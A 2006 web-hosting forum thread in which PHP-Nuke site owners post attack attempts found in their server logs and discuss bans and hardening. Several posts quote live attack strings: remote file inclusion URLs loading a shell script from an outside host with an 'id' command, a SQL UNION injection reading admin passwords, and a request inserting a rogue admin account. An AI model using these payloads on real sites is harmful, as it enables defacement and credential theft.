Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
MarkyBear
Hangin' Around


Joined: Mar 27, 2005
Posts: 39

PostPosted: Wed Feb 15, 2006 9:53 pm Reply with quote

Someone in Turkey is attempting to hack my site, luckily I am patched up, have extra site protection and whomever the hacker is, is using hacks for post nuke and xoops cms which I don't run!

Latest from my error logs:

Code:
[Tue Feb 14 05:01:14 2006] [error] [client 81.214.167.116] File does not exist: /home/xxxxxxxxxx/public_html/modules/PNphpBB2/includes/functions_admin.php

[Tue Feb 14 13:39:19 2006] [error] [client 81.215.237.159] File does not exist: /home/xxxxxxxxxx/public_html/modules/4nAlbum/public/displayCategory.php

[Wed Feb 15 18:16:52 2006] [error] [client 85.98.60.174] File does not exist: /home/xxxxxxxxxx/public_html/modules/My_eGallery/public/displayCategory.php


Here is the links they were using:

Code:
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aviozone.com/tool25.dat?&list=1&cmd=id


/modules/My_eGallery/public/displayCategory.php?basepath=http://aviozone.com/tool25.dat?&list=1&cmd=id


I went to the Only registered users can see links on this board! Get registered or login! but all 'contact us' links brings me to fake email addy's.

But if you copy-paste this link into your browser, you can DL and open in notepad, the tool they're trying to use and it definately is a defacing tool:

Code:
http://aviozone.com/tool25.dat?&list=1&cmd=id


I've banned a few different IP addys so far and three different ranges but they keep coming back, here's what I have banned so far:

81.214.167.116
81.214.160.0 81.214.175.255
81.215.232.0 - 81.215.239.255
81.214.169.117
85.98.60.174
85.98.48.0 - 85.98.63.255

What should I do, I'm tempted to block the entire country next!
 
View user's profile Send private message
Dawg
RavenNuke(tm) Development Team


Joined: Nov 07, 2003
Posts: 910

PostPosted: Wed Feb 15, 2006 10:02 pm Reply with quote

Ban the entire country!! Ban'em All!

I don't know what part of the world you are in or what your site is abou but I have most of the world banned from my site.

If nothing else...Ban it for the next week....they will move on to someone else!

Dawg
 
View user's profile Send private message
MarkyBear
PostPosted: Wed Feb 15, 2006 10:07 pm Reply with quote

Dawg wrote:
Ban the entire country!! Ban'em All!

I don't know what part of the world you are in or what your site is abou but I have most of the world banned from my site.

If nothing else...Ban it for the next week....they will move on to someone else!

Dawg


LMAO, I LIKE IT!!!

They started this back in December, there would be an attempt every other week or so, but now it's every day...

I'm in the USA and have your everyday chat site for sports fans, so I'd have no problem banning the entire country, can that be done in Sentinel??? If not, where do I get the ranges?
 
Dawg
PostPosted: Wed Feb 15, 2006 10:59 pm Reply with quote

Did you install the Ip to Country tables when you installed NS?

If not what version are you running?

Dawg
 
MarkyBear
PostPosted: Wed Feb 15, 2006 11:25 pm Reply with quote

Dawg wrote:
Did you install the Ip to Country tables when you installed NS?

If not what version are you running?

Dawg


Actually I just updated the IP2Countries in NS and saw that the number of pages for Turkey has dropped from 11 to 6...

I guess I just go on down the line and click 'block' for each range on all pages then???
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Wed Feb 15, 2006 11:34 pm Reply with quote

The problem with Turkey is that they are all on dynamic DSL lines now. You ban one IP, they just get another. And banning ranges only works sometimes... each ISP seems to report small ranges that aren't contiguous.

I keep getting referral spam from "bwdow.com" - it autobans the IP but they keep coming
I think I may just go and ban Turkey anyway

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
MarkyBear
PostPosted: Wed Feb 15, 2006 11:53 pm Reply with quote

That's what I'm going to do, Iran too, they've gave me some problems before from some school and when I emailed the admin, he demanded to see all my log files in there entirity before he did anything, needless to say i didn't!
 
Susann
Moderator


Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

PostPosted: Thu Feb 16, 2006 5:49 am Reply with quote

It´s that same tool I´spoke from:
Only registered users can see links on this board! Get registered or login!

It´s present since middle of december and there are different versions available.
 
View user's profile Send private message
MarkyBear
PostPosted: Thu Feb 16, 2006 6:12 am Reply with quote

Yep, it was the ,iddle-end of December that I first noticed this in my error logs...

The site that the tool is hosted on, is poweb I believe, I'll check for sure and then contact them too...

Took awhile, but Turkey has been banned from site now, I'll keep my eyes open for any more of these...

Thanks everyone for their help and hopefully this doesn't get worse for all!
 
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

PostPosted: Thu Feb 16, 2006 6:39 am Reply with quote

well i have about 20 banned countries.
why?....because they enjoy hacking sites or atleast try to.
And if you have a site that makes money somehow those countries will never bring in a penny,so you wont miss a thing....
 
View user's profile Send private message
MarkyBear
PostPosted: Thu Feb 16, 2006 8:37 am Reply with quote

Ya know if there was an easier way to just ban a whole country I'd prlly be up there too!

But this will make you all laugh, Union attack was just blocked by NS, here is the link they tried:

Code:
xtremezone.us/modules.php?name=Search&type=comments&query=not123exists&instory=/**UNION**/ SELECT/**0,0,pwd,0,aid**FROM**/nuke_authors


The funny part is, look at what link refered them to my site, it was a google search of: 'this site is protected by nukesentinel'

Code:
http://www.google.com/search?q=this+site+is+protected+by++nukesentinel&hl=en&lr=&start=10&sa=N


I hope they enjoyed those PC-Killer templates too! Groovy
 
viper155
Regular
Regular


Joined: Feb 18, 2006
Posts: 99

PostPosted: Sat Feb 18, 2006 12:46 pm Reply with quote

Hey, Ive gotten hacked 2 times in the last 2 days... I looked through my access logs and found this link....

Code:
http://*******.com//modules/coppermine/themes/default/theme.php?THEME_DIR=http%3A%2F%2Faviozone.com%2Fshell.dat%3F&act=sql&sql_login=*dbnamewashere*&sql_passwd=*password*&sql_server=localhost&sql_port=3306&sql_db=*DBname*&sql_tbl_act=insert&sql_tbl=nuke_authors&sql_tbl_ls=0&sql_tbl_le=30&sql_tbl_insert_q=+%60aid%60+%3D+%27Viper%27+AND+%60name%60+%3D+%27God%27+AND+%60url%60+%3D+%27http%3A%2F%2Ft*mydomainname*%27+AND+%60email%


the things with * around it was my real info they got*

and here is the DIR site url its using

Code:
http://aviozone.com/shell.dat?&act=about


I removed coppermine and also found a file in the coppermine album folder that was called training.bmp but it was actually somehow a folder and not a image.. I opened it and it seemed like some scripts he prob uploaded through coppermine.

This ip was also from turkey and here it is for you to add to the ban list.

81.214.172.158
 
View user's profile Send private message Visit poster's website
viper155
PostPosted: Sat Feb 18, 2006 2:37 pm Reply with quote

oh just found this.. here are the turkish hackers.. they keep score
Only registered users can see links on this board! Get registered or login!
 
hitwalker
PostPosted: Sat Feb 18, 2006 2:52 pm Reply with quote

nice find but also old news ,and i know about aviozone.
they are just victim in this...and i maild the host this morning...
if you wanna complain to send email to sa-abuse(at)powweb.com
Just ban turkey.
And rename your coppermine...
 
viper155
PostPosted: Sat Feb 18, 2006 3:06 pm Reply with quote

do you think by me removing coppermine I might have a chance to not get hacked tonight... He does it around 7pm est evernight for the last 2 days
 
hitwalker
PostPosted: Sat Feb 18, 2006 3:25 pm Reply with quote

well make sure you are secured,if so dont allow any privileges to upload,then in your coppermine config change your coppermine name to bloodyhell ,or marrs,or belinda carlisle...whatever...
these attacks are mostly by remote...
ever seen a coppermine named president ?
 
MarkyBear
PostPosted: Sat Feb 18, 2006 4:28 pm Reply with quote

viper155, sorry about that happening, and that's around the same time it was tried by my site too...

I just banned all of Turkey...

My hosting Tech support suggested I use mod-rewrite for that tool name to redirect it, I'l like to do this, to the PC-Killers, but how would I go about that!?
 
hitwalker
PostPosted: Sat Feb 18, 2006 5:28 pm Reply with quote

How about what ?
The templates..?
 
MarkyBear
PostPosted: Sat Feb 18, 2006 6:12 pm Reply with quote

hitwalker wrote:
How about what ?
The templates..?


A way to redirect any link with:

Code:
tool25.dat?&list=1&cmd=id


in it or maybe even just the 'tool.dat' part or whatever, but anytime there is a link with that in it, have that link redirected to one of the PC-Killer templates for NS.
 
hitwalker
PostPosted: Sat Feb 18, 2006 6:19 pm Reply with quote

that wont work that way and its not easy.
with sentinel you dont need that realy.
The code they use is basically hosted on another site.
They also dont work,cause ive seem them all by now.

but as a temporary solution you could add to your htaccess
Redirect /whateverabusesive Only registered users can see links on this board! Get registered or login!

the Only registered users can see links on this board! Get registered or login! is the address you gonna send to.
keep the space between whateverabusesive and Only registered users can see links on this board! Get registered or login!
 
viper155
PostPosted: Sun Feb 19, 2006 7:40 am Reply with quote

Anyone know why when I go to the download section and click NukeSentinel my browser gets a error and has to close..

I wanna install that for my site Sad

Im using IE
 
hitwalker
PostPosted: Sun Feb 19, 2006 8:16 am Reply with quote

i think raven is testing the downloads......lol
go to Only registered users can see links on this board! Get registered or login! and download it there ..
 
viper155
PostPosted: Sun Feb 19, 2006 8:18 am Reply with quote

Ok, My php-nuke has alot of edited files for modules such as nuke royal ect... Does anyone install this module for money?Smile

thanks
 
hitwalker
PostPosted: Sun Feb 19, 2006 8:20 am Reply with quote

on what patched nuke version are you?
 
viper155
PostPosted: Sun Feb 19, 2006 8:29 am Reply with quote

I cant say for sure that im even on a patched version... Im running phpnuke 7.6

I was away from the internet for a few months and now that ive come back I have kinda forget everything ive done to the files... My guess is that I will need the patches and NukeSentinel added...

I am willing to pay for this to secure my site
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©